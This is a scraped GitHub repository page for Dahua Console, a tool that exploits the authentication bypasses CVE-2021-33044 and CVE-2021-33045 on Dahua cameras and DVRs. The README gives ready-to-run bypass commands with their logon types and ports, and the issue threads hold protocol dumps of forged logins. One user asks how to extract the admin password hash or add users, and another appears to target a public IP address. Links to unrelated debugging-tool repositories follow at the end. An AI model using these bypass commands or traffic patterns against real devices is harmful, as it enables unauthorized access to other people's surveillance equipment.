Dahua Console, access internal debug console and/or other researched functions in Dahua devices.

Overview

Dahua Console

  • Version: Pre-alpha
  • Bugs: Indeed
  • TODO: Lots of stuff

[Install requirements]

sudo pip3 install -r requirements.txt

[Arguments]

  -h, --help            show this help message and exit
  --rhost RHOST         Remote Target Address (IP/FQDN)
  --rport RPORT         Remote Target Port
  --proto {dhip,dvrip,3des,http,https}
                        Protocol [Default: dvrip]
  --relay RELAY         ssh://
   
    :
    
     @
     
      :
      
       
  --auth AUTH           Credentials (username:password) [Default: None]
  --ssl                 Use SSL for remote connection
  -d, --debug           JSON traffic
  -dd, --ddebug         hexdump traffic
  --dump {config,service,device,discover,log,test}
                        Dump remote config
  --dump_argv DUMP_ARGV
                        ARGV to --dump
  --test                test w/o login attempt
  --multihost           Connect hosts from "dhConsole.json"
  --save                Save host hash to "dhConsole.json"
  --events              Subscribe to events [Default: False]
  --discover {dhip,dvrip}
                        Discover local devices
  --logon {wsse,loopback,netkeyboard,onvif:plain,onvif:digest,onvif:onvif,plain,ushield,ldap,ad,cms,local,rtsp,basic,old_digest,gui}
                        Logon types
  -f, --force           Bypass stops for dangerous commands
  --calls               Debug internal calls

      
     
    
   

[Release]

[Update]

2021-10-07

Details here: https://github.com/mcw0/PoC/blob/master/Dahua%20authentication%20bypass.txt

2021-10-06

[CVE-2021-33044]

Protocol needed: DHIP or HTTP/HTTPS (DHIP do not work with TLS/SSL @TCP/443)

[proto: dhip, normally using tcp/5000]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto dhip --rport 5000

[proto: dhip, usually working with HTTP port as well]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto dhip --rport 80

[proto: http/https]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto http --rport 80
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto https --rport 443

[CVE-2021-33045]

Protocol needed: DHIP (DHIP do not work with TLS/SSL @TCP/443)

[proto: dhip, normally using tcp/5000]
./Console.py --logon loopback --rhost 192.168.57.20 --proto dhip --rport 5000

[proto: dhip, usually working with HTTP port as well]
./Console.py --logon loopback --rhost 192.168.57.20 --proto dhip --rport 80

Comments
  • imou ranger 2 errors

    imou ranger 2 errors

    ./env/bin/python Console.py --auth admin:XXXXXX --rhost 192.168.124.196 --proto dhip --rport 80 -d [*] [Dahua Debug Console 2019-2021 bashis ] [*] logon type "default" with proto "dhip" at 192.168.124.196:80 [+] Opening connection to 192.168.124.196 on port 80: Done [-] Dahua Debug Console: Trying [+] Login: Success [BEGIN SEND (192.168.124.196)] <------------------1801------------------> 20000000|44484950|00000000|00000000|91000000|00000000|91000000|00000000 {"method": "global.login", "params": {"userName": "admin", "password": "", "clientType": "Web3.0", "loginType": "Direct"}, "id": 0, "session": 0} [ END SEND (192.168.124.196)] <------------------1801------------------> [BEGIN RECV (192.168.124.196)] <------------------1917------------------> 20000000|44484950|d9649aa9|00000000|eb000000|00000000|eb000000|00000000 {"result":false,"params":{"realm":"Login to EB2711F0F250EAB5","random":"80480036-1e1f-4669-812b-70d7470d6025","encryption":"Default"},"error":{"code":268632079,"message":"Component error: login challenge!"},"id":0,"session":2845467865} [ END RECV (192.168.124.196)] <------------------1917------------------> [BEGIN SEND (192.168.124.196)] <------------------1801------------------> 20000000|44484950|d9649aa9|01000000|09010000|00000000|09010000|00000000 {"method": "global.login", "params": {"userName": "admin", "ipAddr": "127.0.0.1", "loginType": "Direct", "clientType": "Console", "authorityType": "Default", "passwordType": "Default", "password": "5D62F915E62F3BC989F6A31E27C"}, "id": 1, "session": 2845467865} [ END SEND (192.168.124.196)] <------------------1801------------------> [BEGIN RECV (192.168.124.196)] <------------------1917------------------> 20000000|44484950|d9649aa9|01000000|4d000000|00000000|4d000000|00000000 {"result":true,"params":{"keepAliveInterval":30},"id":1,"session":2845467865} [ END RECV (192.168.124.196)] <------------------1917------------------> [BEGIN SEND (192.168.124.196)] <------------------1801------------------> 20000000|44484950|d9649aa9|02000000|5e000000|00000000|5e000000|00000000 {"method": "userManager.getActiveUserInfoAll", "params": null, "id": 2, "session": 2845467865} [+] keepAlive thread: Started [ END SEND (192.168.124.196)] <------------------1801------------------> [BEGIN RECV (192.168.124.196)] <------------------1917------------------> 20000000|44484950|d9649aa9|02000000|c4000000|00000000|c4000000|00000000 {"result":true,"params":{"users":[{"Id":1,"Name":"admin","Group":"admin","ClientType":"RemoteRPC","ClientAddress":"192.168.123.10","LoginTime":"2022-05-13 19:00:25"}]},"id":2,"session":2845467865} [ END RECV (192.168.124.196)] <------------------1917------------------> [*] [Active Users] [email protected] since 2022-05-13 19:00:25 with "RemoteRPC" (Id: 1) [BEGIN SEND (192.168.124.196)] <------------------1801------------------> 20000000|44484950|d9649aa9|06000000|4c010000|00000000|4c010000|00000000 {"method": "system.multicall", "params": [{"method": "magicBox.getDeviceType", "params": null, "id": 3, "session": 2845467865}, {"method": "magicBox.getDeviceClass", "params": null, "id": 4, "session": 2845467865}, {"method": "global.getCurrentTime", "params": null, "id": 5, "session": 2845467865}], "id": 6, "session": 2845467865} [ END SEND (192.168.124.196)] <------------------1801------------------> [BEGIN RECV (192.168.124.196)] <------------------1917------------------> 20000000|44484950|d9649aa9|06000000|da000000|00000000|da000000|00000000 {"result":true,"params":[{"result":true,"id":3,"params":{"type":"IPC-A22E-B"}},{"result":true,"id":4,"params":{"type":"IPC"}},{"result":true,"id":5,"params":{"time":"2022-05-13 19:00:25"}}],"id":6,"session":2845467865} [ END RECV (192.168.124.196)] <------------------1917------------------> [*] Remote Model: IPC-A22E-B, Class: IPC, Time: 2022-05-13 19:00:25 [BEGIN SEND (192.168.124.196)] <------------------1801------------------> 20000000|44484950|d9649aa9|07000000|50000000|00000000|50000000|00000000 {"method": "system.listService", "params": null, "id": 7, "session": 2845467865} [ END SEND (192.168.124.196)] <------------------1801------------------> [BEGIN RECV (192.168.124.196)] <------------------1917------------------> 20000000|44484950|d9649aa9|07000000|65000000|00000000|65000000|00000000 {"result":false,"error":{"code":268632064,"message":"InterfaceNotFound"},"id":7,"session":2845467865} [ END RECV (192.168.124.196)] <------------------1917------------------> [Console]# services [-] Invalid command: 'help' for help [Console]# service Traceback (most recent call last): File "/home/msw/soft/DahuaConsole/Console.py", line 852, in main() File "/home/msw/soft/DahuaConsole/Console.py", line 846, in main DebugConsole(dargs=dargs) File "/home/msw/soft/DahuaConsole/Console.py", line 28, in init self.main_console() File "/home/msw/soft/DahuaConsole/Console.py", line 239, in main_console exec(tmp) File "", line 1, in File "/home/msw/soft/DahuaConsole/dahua.py", line 97, in list_service self.check_for_service('dump') File "/home/msw/soft/DahuaConsole/net.py", line 1163, in check_for_service if not len(self.RemoteServicesCache): TypeError: object of type 'bool' has no len() [*] Closed connection to 192.168.124.196 port 80

    opened by luzik 7
  • AttributeError(

    AttributeError("'NoneType' object has no attribute 'get'")

    Hi, i'm trying to connect to https://www.dahuasecurity.com/products/All-Products/Access-Control--Time-Attendance/Access-Control/Standalone/ASI1201E/ASI1201E-D

    but i get this error. PS: I am looking for a way to connect it to homeassistant.

    ./Console.py --logon netkeyboard --rhost 192.168.90.5 --rport 37777 --auth admin:****** -d [*] [Dahua Debug Console 2019-2021 bashis ] [*] logon type "netkeyboard" with proto "dhip" at 192.168.90.5:37777 [+] Opening connection to 192.168.90.5 on port 37777: Done [./......] Dahua Debug Console: Trying [+] Login: Success [BEGIN SEND (192.168.90.5)] <------------------1803------------------> 20000000|44484950|00000000|00000000|91000000|00000000|91000000|00000000 {"method": "global.login", "params": {"userName": "admin", "password": "", "clientType": "Web3.0", "loginType": "Direct"}, "id": 0, "session": 0} [ END SEND (192.168.90.5)] <------------------1803------------------> [BEGIN RECV (192.168.90.5)] <------------------1919------------------> 20000000|44484950|d710c601|00000000|ac000000|00000000|ac000000|00000000 { "result": false, "params": { "realm": "Login to ASI1201E", "random": "29757655", "encryption": "Default" }, "error": { "code": 268632079 }, "id": 0, "session": 29757655 } [ END RECV (192.168.90.5)] <------------------1919------------------> [BEGIN SEND (192.168.90.5)] <------------------1803------------------> 20000000|44484950|d710c601|01000000|0b010000|00000000|0b010000|00000000 {"method": "global.login", "params": {"userName": "admin", "ipAddr": "127.0.0.1", "loginType": "Direct", "clientType": "NetKeyboard", "authorityType": "Default", "passwordType": "Default", "password": "61C31760B8AAB860833EE2083568AA60"}, "id": 1, "session": 29757655} [ END SEND (192.168.90.5)] <------------------1803------------------> [BEGIN RECV (192.168.90.5)] <------------------1919------------------> 20000000|44484950|d710c601|01000000|40000000|00000000|40000000|00000000 { "result": true, "params": null, "id": 1, "session": 29757655 } [ END RECV (192.168.90.5)] <------------------1919------------------> [BEGIN SEND (192.168.90.5)] <------------------1803------------------> 20000000|44484950|d710c601|02000000|5c000000|00000000|5c000000|00000000 {"method": "userManager.getActiveUserInfoAll", "params": null, "id": 2, "session": 29757655} [ END SEND (192.168.90.5)] <------------------1803------------------> [+] keepAlive thread: Started [BEGIN RECV (192.168.90.5)] <------------------1919------------------> 20000000|44484950|d710c601|02000000|2c000000|00000000|2c000000|00000000 { "result": false, "id": 2, "params": null } [ END RECV (192.168.90.5)] <------------------1919------------------> AttributeError("'NoneType' object has no attribute 'get'") [-] [MainConsole] [*] All done [*] Closed connection to 192.168.90.5 port 37777

    opened by smsalert-mobi 5
  • Password hash

    Password hash

    I remotely connected to the DVR and got access to the console which allows me to execute some commands. Along with this, I see the inscription "Attack console failed. Using local only". Why do I see this inscription but at the same time I can use the console and get some information about the device. What command should I use to add a new user or get the password hash from the admin user?

    IMG_20211116_163810_503

    opened by Yev-henii 3
  • could not use 'diag nfs mount'

    could not use 'diag nfs mount'

    _[Console]# diag 
    [*] [usage]
        diag nfs status (Check if NFS mounted)
        diag nfs mount [<server host> /<server path>]
        diag nfs umount (Umount NFS)
        diag usb get (Not done yet)
        diag usb set (Not done yet)
        diag pcap start (Start capture)
        diag pcap stop (Stop capture)
        diag pcap filter <get> | <set> <lo|eth0|eth2> <host>
        diag coredump start (Start coredump support)
        diag coredump stop (Stop coredump support)
        diag logs start (Start redirect logs to NFS)
        diag logs stop (Stop redirect logs to NFS)
    [Console]# diag nfs mount 10.2.1.110 /c/public
    [-] Service [InterimRemoteDiagnose] not supported on remote device
    [Console]# diag nfs mount 10.2.1.110 /c/public/
    [-] Service [InterimRemoteDiagnose] not supported on remote device
    [Console]# diag nfs mount 10.2.1.110 /c/public/
    [-] Service [InterimRemoteDiagnose] not supported on remote device
    [Console]# diag nfs mount 10.2.1.110 /c/
    [-] Service [InterimRemoteDiagnose] not supported on remote device
    [Console]# diag nfs mount 10.2.1.110 /c/
    [-] Service [InterimRemoteDiagnose] not supported on remote device
    [Console]# diag nfs mount 10.2.1.110 /c/public
    [-] Service [InterimRemoteDiagnose] not supported on remote device_
    

    can somebody help me with this 'diag nfs mount' my nfs server is ok, i can test it on my centos7.6 server like : mount -o nolock -t 10.2.1.110:/c/public /mnt

    opened by whysoga 2
  • AttributeError(

    AttributeError("'bool' object has no attribute 'get'")

    └─$ python3 Console.py --logon netkeyboard --rhost --rport 8081 --proto http [*] [Dahua Debug Console 2019-2021 bashis ] [*] logon type "netkeyboard" with proto "http" at [▘] Dahua Debug Console: Trying [+] Login: Success [+] keepAlive thread: Started AttributeError("'bool' object has no attribute 'get'") [-] [MainConsole] [*] All done

    Using Linux and latest version of Console.

    opened by ghost 2
  • Access to OS

    Access to OS

    using this cve I get access to certain functions of the camera, but there is no way to access the operating system of the camera. Is it possible to access the operating system of the camera through Console.py?

    opened by h-moody 1
  • global.getCurrentTime does not exist on every camera, crashing program

    global.getCurrentTime does not exist on every camera, crashing program

    Hi,

    Just to let you (and anyone else who may have the same problem) know, on line 490 of net.py there is:

    dh_data.get('global.getCurrentTime').get('params').get('time'),
    

    This is not working with my camera. Maybe because mine firmware is from 2014.

    So anyway, I changed:

            log.info("Remote Model: {}, Class: {}, Time: {}".format(
                self.DeviceType,
                self.DeviceClass,
                dh_data.get('global.getCurrentTime').get('params').get('time'),
            ))
    

    To:

            log.info("Remote Model: {}, Class: {}".format(
                self.DeviceType,
                self.DeviceClass
            ))
    

    And it's working. I'd open pull request for that, but it's already late for me. You can change this in your code if you want.

    opened by LukaszMoskala 1
  • TypeError: expected string or bytes-like object  When used http proto

    TypeError: expected string or bytes-like object When used http proto

    python3 Console.py --logon netkeyboard --rhost 79.179.42.47 --proto http --rport 80 [*] [Dahua Debug Console 2019-2021 bashis ] [*] logon type "netkeyboard" with proto "http" at 79.179.42.47:80 [▘] Dahua Debug Console: Trying [/] Login Traceback (most recent call last): File "/root/Desktop/tools/DahuaConsole/Console.py", line 852, in main() File "/root/Desktop/tools/DahuaConsole/Console.py", line 846, in main DebugConsole(dargs=dargs) File "/root/Desktop/tools/DahuaConsole/Console.py", line 28, in init self.main_console() File "/root/Desktop/tools/DahuaConsole/Console.py", line 194, in main_console if not self.connect_rhost( File "/root/Desktop/tools/DahuaConsole/connection.py", line 87, in connect_rhost if not dh.dh_connect(username=username, password=password, logon=logon, force=self.dargs.force): File "/root/Desktop/tools/DahuaConsole/net.py", line 431, in dh_connect if not self.dahua_dhip_login(username=username, password=password, logon=logon, force=force): File "/root/Desktop/tools/DahuaConsole/net.py", line 2056, in dahua_dhip_login dh_data = self.send_call(query_args, errorcodes=True, login=True) File "/root/Desktop/tools/DahuaConsole/net.py", line 707, in send_call dh_data = self.p2p(query_args, login=login) File "/root/Desktop/tools/DahuaConsole/net.py", line 1747, in p2p dh_data = self.remote.send(query_args=packet, login=login, timeout=20) File "/root/Desktop/tools/DahuaConsole/relay.py", line 156, in send dh_data = self.post(self._get_url(login, url), query_args, timeout) File "/root/Desktop/tools/DahuaConsole/relay.py", line 235, in post return self.remote.post(self.uri + url, json=query_args, verify=False, allow_redirects=False, timeout=timeout) File "/usr/local/lib/python3.9/dist-packages/requests/sessions.py", line 590, in post return self.request('POST', url, data=data, json=json, **kwargs) File "/usr/local/lib/python3.9/dist-packages/requests/sessions.py", line 528, in request prep = self.prepare_request(req) File "/usr/local/lib/python3.9/dist-packages/requests/sessions.py", line 456, in prepare_request p.prepare( File "/usr/local/lib/python3.9/dist-packages/requests/models.py", line 318, in prepare self.prepare_cookies(cookies) File "/usr/local/lib/python3.9/dist-packages/requests/models.py", line 575, in prepare_cookies cookie_header = get_cookie_header(self._cookies, self) File "/usr/local/lib/python3.9/dist-packages/requests/cookies.py", line 142, in get_cookie_header jar.add_cookie_header(r) File "/usr/lib/python3.9/http/cookiejar.py", line 1367, in add_cookie_header attrs = self._cookie_attrs(cookies) File "/usr/lib/python3.9/http/cookiejar.py", line 1326, in _cookie_attrs self.non_word_re.search(cookie.value) and version > 0): TypeError: expected string or bytes-like object [*] DahuaHttp DELETE

    opened by zlgxzswjy 0
Owner
bashis
nobody
bashis
A configurable set of panels that display various debug information about the current request/response.

Django Debug Toolbar The Django Debug Toolbar is a configurable set of panels that display various debug information about the current request/respons

Jazzband 7.3k Dec 31, 2022
🍦 Never use print() to debug again.

IceCream -- Never use print() to debug again Do you ever use print() or log() to debug your code? Of course you do. IceCream, or ic for short, makes p

Ansgar Grunseid 6.5k Jan 7, 2023
A configurable set of panels that display various debug information about the current request/response.

Django Debug Toolbar The Django Debug Toolbar is a configurable set of panels that display various debug information about the current request/respons

Jazzband 7.3k Dec 29, 2022
An x86 old-debug-like program.

An x86 old-debug-like program.

Pablo Niklas 1 Jan 10, 2022
Full-screen console debugger for Python

PuDB: a console-based visual debugger for Python Its goal is to provide all the niceties of modern GUI-based debuggers in a more lightweight and keybo

Andreas Klöckner 2.6k Jan 1, 2023
Middleware that Prints the number of DB queries to the runserver console.

Django Querycount Inspired by this post by David Szotten, this project gives you a middleware that prints DB query counts in Django's runserver consol

Brad Montgomery 332 Dec 23, 2022
Arghonaut is an interactive interpreter, visualizer, and debugger for Argh! and Aargh!

Arghonaut Arghonaut is an interactive interpreter, visualizer, and debugger for Argh! and Aargh!, which are Befunge-like esoteric programming language

Aaron Friesen 2 Dec 10, 2021
Debugger capable of attaching to and injecting code into python processes.

DISCLAIMER: This is not an official google project, this is just something I wrote while at Google. Pyringe What this is Pyringe is a python debugger

Google 1.6k Dec 15, 2022
🔥 Pyflame: A Ptracing Profiler For Python. This project is deprecated and not maintained.

Pyflame: A Ptracing Profiler For Python (This project is deprecated and not maintained.) Pyflame is a high performance profiling tool that generates f

Uber Archive 3k Jan 7, 2023
Parsing ELF and DWARF in Python

pyelftools pyelftools is a pure-Python library for parsing and analyzing ELF files and DWARF debugging information. See the User's guide for more deta

Eli Bendersky 1.6k Jan 4, 2023
Code2flow generates call graphs for dynamic programming language. Code2flow supports Python, Javascript, Ruby, and PHP.

Code2flow generates call graphs for dynamic programming language. Code2flow supports Python, Javascript, Ruby, and PHP.

Scott Rogowski 3k Jan 1, 2023
AryaBota: An app to teach Python coding via gradual programming and visual output

AryaBota An app to teach Python coding, that gradually allows students to transition from using commands similar to natural language, to more Pythonic

null 5 Feb 8, 2022
Full featured multi arch/os debugger built on top of PyQt5 and frida

Full featured multi arch/os debugger built on top of PyQt5 and frida

iGio90 1.1k Dec 26, 2022
VizTracer is a low-overhead logging/debugging/profiling tool that can trace and visualize your python code execution.

VizTracer is a low-overhead logging/debugging/profiling tool that can trace and visualize your python code execution.

null 2.8k Jan 8, 2023
A package containing a lot of useful utilities for Python developing and debugging.

Vpack A package containing a lot of useful utilities for Python developing and debugging. Features Sigview: press Ctrl+C to print the current stack in

volltin 16 Aug 18, 2022
A web-based visualization and debugging platform for NuPIC

Cerebro 2 A web-based visualization and debugging platform for NuPIC. Usage Set up cerebro2.server to export your model state. Then, run: cd static py

Numenta 24 Oct 13, 2021
Trace all method entries and exits, the exit also prints the return value, if it is of basic type

Trace all method entries and exits, the exit also prints the return value, if it is of basic type. The apk must have set the android:debuggable="true" flag.

Kurt Nistelberger 7 Aug 10, 2022
Sane color handling of osx's accent and highlight color from the commandline

osx-colors Sane command line color customisation for osx, no more fiddling about with defaults, internal apple color constants and rgb color codes Say

Clint Plummer 8 Nov 17, 2022
The official code of LM-Debugger, an interactive tool for inspection and intervention in transformer-based language models.

LM-Debugger is an open-source interactive tool for inspection and intervention in transformer-based language models. This repository includes the code

Mor Geva 110 Dec 28, 2022